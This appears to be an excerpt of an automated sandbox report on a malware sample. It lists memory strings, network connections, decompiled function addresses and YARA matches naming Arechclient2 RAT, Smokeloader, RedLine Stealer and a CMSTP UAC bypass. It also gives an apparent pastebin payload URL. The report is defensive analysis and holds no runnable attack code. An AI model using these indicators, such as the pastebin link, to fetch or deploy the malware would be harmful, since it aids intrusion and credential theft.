Source: MSBuild.exe, 0000000C.00000002.2979656703.0000000002A33000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002AD4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003B4D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002BCB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.00000000029DB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.000000000291B000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D7D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D18000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002CC2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003A92000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D1E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003A76000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002B2C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: MSBuild.exe, 0000000C.00000002.2979656703.0000000002A33000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002AD4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003B4D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002BCB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.00000000029DB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.000000000291B000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D7D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D18000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002CC2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003A92000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D1E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003A76000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002B2C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: MSBuild.exe, 0000000C.00000002.2979656703.0000000002A33000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002AD4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003B4D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002BCB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.00000000029DB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.000000000291B000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D7D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D18000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002CC2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003A92000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D1E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003A76000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002B2C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: MSBuild.exe, 0000000C.00000002.2979656703.0000000002A33000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002AD4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003B4D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002BCB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.00000000029DB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.000000000291B000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D7D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D18000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002CC2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003A92000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D1E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003A76000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002B2C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: MSBuild.exe, 0000000C.00000002.3006749447.00000000066D3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.3006242825.00000000066C2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/cr/report
Source: TNQTc6Qmkg.exe, 00000000.00000003.2231044420.0000000005EDD000.00000004.00000020.00020000.00000000.sdmp, run.exe, 00000005.00000002.2297293359.0000000003BCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2594864745.0000000005671000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2730690127.0000000003E57000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2971340009.000000000576A000.00000004.00000800.00020000.00000000.sdmp, run.exe.0.dr	String found in binary or memory: https://d.symcb.com/cps0%
Source: TNQTc6Qmkg.exe, 00000000.00000003.2231044420.0000000005EDD000.00000004.00000020.00020000.00000000.sdmp, run.exe, 00000005.00000002.2297293359.0000000003BCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2594864745.0000000005671000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2730690127.0000000003E57000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2971340009.000000000576A000.00000004.00000800.00020000.00000000.sdmp, run.exe.0.dr	String found in binary or memory: https://d.symcb.com/rpa0
Source: u3bs.3.exe, 00000011.00000002.2974514605.000000000266E000.00000004.00001000.00020000.00000000.sdmp, u3bs.3.exe, 00000011.00000002.2974514605.00000000026F8000.00000004.00001000.00020000.00000000.sdmp, u3bs.3.exe, 00000011.00000002.2974514605.000000000268E000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe
Source: u3bs.3.exe, 00000011.00000002.2974514605.00000000026CC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe.
Source: u3bs.3.exe, 00000011.00000002.2974514605.00000000026A4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe.6-
Source: u3bs.3.exe, 00000011.00000002.2969616251.00000000008D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exebbC
Source: MSBuild.exe, 0000000C.00000002.2979656703.0000000002A33000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002AD4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003B4D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002BCB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.00000000029DB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.000000000291B000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D7D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D18000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002CC2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003A92000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D1E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003A76000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002B2C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: MSBuild.exe, 0000000C.00000002.2979656703.0000000002AD4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003B4D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002BCB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.00000000029DB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.000000000291B000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002CC2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003A92000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D1E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: MSBuild.exe, 0000000C.00000002.2979656703.0000000002A33000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D7D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D18000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003A76000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002B2C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtabS
Source: MSBuild.exe, 0000000C.00000002.2979656703.0000000002A33000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002AD4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003B4D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002BCB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.00000000029DB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.000000000291B000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D7D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D18000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002CC2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003A92000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D1E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003A76000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002B2C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: https://mozilla.org0/
Source: MSBuild.exe, 0000001B.00000002.2976876092.00000000033A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/z9pYkqPQ
Source: MSBuild.exe, 0000001B.00000002.2976876092.00000000033A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/z9pYkqPQPOdq8
Source: TNQTc6Qmkg.exe, 00000000.00000003.2778288110.0000000007614000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0D
Source: u3bs.0.exe, 00000001.00000003.2563120813.0000000005CC1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: u3bs.0.exe, 00000001.00000003.2563120813.0000000005CC1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: u3bs.0.exe, 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmp, u3bs.0.exe, 00000001.00000003.1982604362.00000000246ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: u3bs.0.exe, 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016.exe
Source: u3bs.0.exe, 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmp, u3bs.0.exe, 00000001.00000003.1982604362.00000000246ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: u3bs.0.exe, 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17chost.exe
Source: TNQTc6Qmkg.exe, 00000000.00000003.2778288110.0000000007614000.00000004.00000020.00020000.00000000.sdmp, run.exe, 00000005.00000002.2297293359.0000000003BCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2594864745.0000000005671000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2730690127.0000000003E57000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2971340009.000000000576A000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: MSBuild.exe, 0000000C.00000002.2979656703.0000000002A33000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002AD4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003B4D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002BCB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.00000000029DB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.000000000291B000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D7D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D18000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002CC2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003A92000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D1E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003A76000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002B2C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: MSBuild.exe, 0000000C.00000002.2979656703.0000000002A33000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002AD4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003B4D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002BCB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.00000000029DB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.000000000291B000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D7D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D18000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002CC2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003A92000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D1E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003A76000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002B2C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: u3bs.0.exe, 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: u3bs.0.exe, 00000001.00000003.2563120813.0000000005CC1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: u3bs.0.exe, 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: https://www.mozilla.org/about/t.exe
Source: u3bs.0.exe, 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: u3bs.0.exe, 00000001.00000003.2563120813.0000000005CC1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: u3bs.0.exe, 00000001.00000003.2563120813.0000000005CC1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: u3bs.0.exe, 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: u3bs.0.exe, 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: u3bs.0.exe, 00000001.00000003.2563120813.0000000005CC1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756

Source: unknown	HTTPS traffic detected: 173.222.162.32:443 -> 192.168.2.4:49757 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 169.150.236.99:443 -> 192.168.2.4:49761 version: TLS 1.2

Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe

Code function: 5_2_0009C8B0 GetClientRect,GetDC,CreateCompatibleBitmap,GetDC,CreateCompatibleDC,BitBlt,

5_2_0009C8B0

System Summary

Malicious sample detected (through community Yara rule)

Source: 14.2.cmd.exe.5d800c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: 5.2.run.exe.3c1a15b.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 14.2.cmd.exe.5d800c8.7.unpack, type: UNPACKEDPE	Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: 14.2.cmd.exe.57b4e64.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 6.2.cmd.exe.60b00c8.8.unpack, type: UNPACKEDPE	Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: 13.2.run.exe.3ea215b.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 5.2.run.exe.3bd686d.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 6.2.cmd.exe.60b00c8.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: 6.2.cmd.exe.56bbe64.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 13.2.run.exe.3e5e86d.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 27.2.MSBuild.exe.1370000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: 14.2.cmd.exe.5770976.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 13.2.run.exe.3ea2d5b.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 6.2.cmd.exe.56bb264.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 6.2.cmd.exe.5677976.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 5.2.run.exe.3c1ad5b.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 14.2.cmd.exe.57b4264.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000001.00000002.2974851008.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000001.00000002.2975209039.0000000004314000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.2972573005.0000000004265000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: C:\Users\user\AppData\Local\Temp\bxhlahunbhc, type: DROPPED	Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\osssciedmed, type: DROPPED	Matched rule: Detects Arechclient2 RAT Author: ditekSHen

Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6B07F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	1_2_6B07F280
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6B0DB910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,	1_2_6B0DB910
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6B0DB8C0 rand_s,NtQueryVirtualMemory,	1_2_6B0DB8C0
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6B0DB700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	1_2_6B0DB700
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6B09ED10 malloc,NtFlushVirtualMemory,memset,memset,memset,memset,memset,memcpy,free,memset,memset,memcpy,memset,memset,memset,memset,memset,	1_2_6B09ED10

Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Code function: 0_2_00427880	0_2_00427880
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Code function: 0_2_0040B8AE	0_2_0040B8AE
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Code function: 0_2_0040C191	0_2_0040C191
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Code function: 0_2_004123A0	0_2_004123A0
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Code function: 0_2_0040F441	0_2_0040F441
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Code function: 0_2_0040C44C	0_2_0040C44C
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Code function: 0_2_0042140C	0_2_0042140C
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Code function: 0_2_0040BC20	0_2_0040BC20
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Code function: 0_2_0041BE39	0_2_0041BE39
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Code function: 0_2_0040BECA	0_2_0040BECA
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Code function: 0_2_00408761	0_2_00408761
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Code function: 0_2_0041B722	0_2_0041B722
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Code function: 0_2_0040C7FC	0_2_0040C7FC
